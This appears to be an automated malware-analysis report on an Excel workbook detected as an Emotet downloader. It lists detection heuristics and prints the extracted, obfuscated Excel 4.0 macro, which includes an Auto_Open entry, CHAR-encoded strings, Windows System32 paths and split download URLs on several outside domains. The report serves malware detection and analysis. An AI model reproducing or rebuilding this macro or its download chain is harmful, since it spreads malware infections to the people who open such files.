MALICIOUS
200
Risk Score
Heuristics 4
-
ClamAV: Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 8189 bytes |
SHA-256: 1c4ca3ac7a958ad30d20e2cbe71ce64d8944a312564cef26f4a1a0bcd74ec445 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Sheet
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.SINGLE hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 58 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G3
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Sheet,E2,CHAR(216/2),""
' Sheet,K2,CHAR(35*2),""
' Sheet,S2,CHAR(100-35),""
' Sheet,B3,CHAR(236-118),""
' Sheet,I3,CHAR(238/2),""
' Sheet,O3,CHAR(134/2),""
' Sheet,U3,"",5.00000000000000000000
' Sheet,A4,CHAR(228/2),""
' Sheet,M4,CHAR(148/2),""
' Sheet,Q4,"",1.00000000000000000000
' Sheet,T4,CHAR(42*2),""
' Sheet,J5,CHAR(52*2),""
' Sheet,S5,CHAR(100/2),""
' Sheet,D6,CHAR(185-110),""
' Sheet,Q6,CHAR(220-111),""
' Sheet,L7,CHAR(170/2),""
' Sheet,V7,CHAR(224/2),""
' Sheet,G8,CHAR(109-40),""
' Sheet,M8,CHAR(200-100),""
' Sheet,P8,CHAR(232/2),""
' Sheet,T9,CHAR(194/2),""
' Sheet,F10,CHAR(203-102),""
' Sheet,K10,CHAR(164-82),""
' Sheet,B11,CHAR(220/2),""
' Sheet,H11,"",4.00000000000000000000
' Sheet,O11,CHAR(96/2),""
' Sheet,Q11,CHAR(136/2),""
' Sheet,H13,CHAR(166/2),""
' Sheet,L13,CHAR(33*2),""
' Sheet,S13,CHAR(210/2),""
' Sheet,E14,CHAR(240-120),""
' Sheet,F14,"",3.00000000000000000000
' Sheet,N14,CHAR(217-100),""
' Sheet,P15,CHAR(202-103),""
' Sheet,C16,CHAR(206-103),""
' Sheet,M16,CHAR(152-76),""
' Sheet,T16,CHAR(242/2),""
' Sheet,R17,CHAR(212-101),""
' Sheet,O18,CHAR(230/2),""
' Sheet,U21,"",1.00000000000000000000
' Sheet,F28,CHAR(32),""
' Sheet,R3,T( Shee!S2& Shee!F24& Shee!F26& Shee!F24& Shee!M4& Shee!M4& Shee!O3& Shee!O3& Shee!L13& Shee!L13& Shee!F24),""
' Sheet,F6,T( Shee!L30& Shee!F24& Shee!N14& Shee!A4& Shee!E2& Shee!Q6& Shee!R17),""
' Sheet,N19,T( Shee!B11& Shee!F24& Shee!F26& Shee!F24& Shee!L7& Shee!K10& Shee!M16& Shee!Q11& Shee!R17& Shee!I3& Shee!B11& Shee!E2& Shee!R17& Shee!T9& Shee!M8& Shee!T4& Shee!R17& Shee!K2& Shee!S13& Shee!E2),""
' Sheet,F26,T( Sheet!H10& Sheet!H14& Sheet!E21),""
' Sheet,I27,T( Sheet!L10& Sheet!L14& Sheet!E21),""
' Sheet,G28,T( Sheet!J10& Sheet!J14& Sheet!E21),""
' Sheet,J29,T( Sheet!N10& Sheet!N14& Sheet!E21),""
' Sheet,D5,T("System32\"),""
' Sheet,L8,T( Shee!F28& Shee!H28& Shee!H28& Shee!H26),""
' Sheet,R13,T( Shee!H28& Shee!H28& Shee!H26),""
' Sheet,J14,T( Shee!F10& Shee!C16& Shee!O18& Shee!B3),""
' Sheet,F19,T(":\Windows\"),""
' Sheet,M26,T( Shee!F24& Shee!F26& Shee!O11& Shee!F26& Shee!O11& Shee!L31),""
' Sheet,C32,T( Shee!F14& Shee!S5& Shee!H28& Shee!F10& Shee!E14),""
' Sheet,H7,"",1.00000000000000000000
' Sheet,J7,"",2.00000000000000000000
' Sheet,L7,"",3.00000000000000000000
' Sheet,N7,"",4.00000000000000000000
' Sheet,H10,"['"://helpeve.com/multiw"', 'TEXT(56656436466735.00000000000000000000)']",""
' Sheet,J10,"['"://hsweixintp.com/wp-adm"', 'TEXT(144552434315.00000000000000000000)']",""
' Sheet,L10,"['"://9hym.com/images/SXVI"', 'TEXT(432331536243.00000000000000000000)']",""
' Sheet,N10,"['"://yuanliao.raluking.com/over"', 'TEXT(574354525236.00000000000000000000)']",""
' Sheet,H14,"['"p/cxpkaAkAKPRUs4KL/"', 'TEXT(7656364755466430.00000000000000000000)']",""
' Sheet,J14,"['"in/3c2etiFC2RwmHfTS/"', 'TEXT(5754235354625.00000000000000000000)']",""
' Sheet,L14,"['"e4tbJw8ZCfa4TEt/"', 'TEXT(464253243255325.00000000000000000000)']",""
' Sheet,N14,"['"emotionality/Vfc9v1ebcmaEguw/"', 'TEXT(645422525431.00000000000000000000)']",""
' Sheet,E21,T( Shee!F24& Shee!F26& Shee!F24),""
' Sheet,J3,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!F14& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
' Sheet,E9,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!Q4& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
' Sheet,L12,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!H11& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
' Sheet,G15,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!S5& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
' Sheet,Q21,T( Shee!F26& Shee!O11& Shee!F26& Shee!F24& Shee!I15& Shee!P8& Shee!P8& Shee!G17),""
' Sheet,G13,"FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!F26& Sheet!R13& Sheet!E9& Sheet!M26,G16)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!E9& Shee!F24& Shee!L31,G18)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!G28& Sheet!R13& Sheet!G15& Sheet!M26,G20)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!G15& Shee!F24& Shee!L31,G22)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!I27& Sheet!R13& Sheet!J3& Sheet!M26,G24)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!J3& Shee!F24& Shee!L31,G26)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!J29& Sheet!R13& Sheet!L12& Sheet!M26,G28)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!L12& Shee!F24& Shee!L31,G30)=FORMULA( Shee!L24& Shee!G44& Shee!H46& Shee!J44,G36)",""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.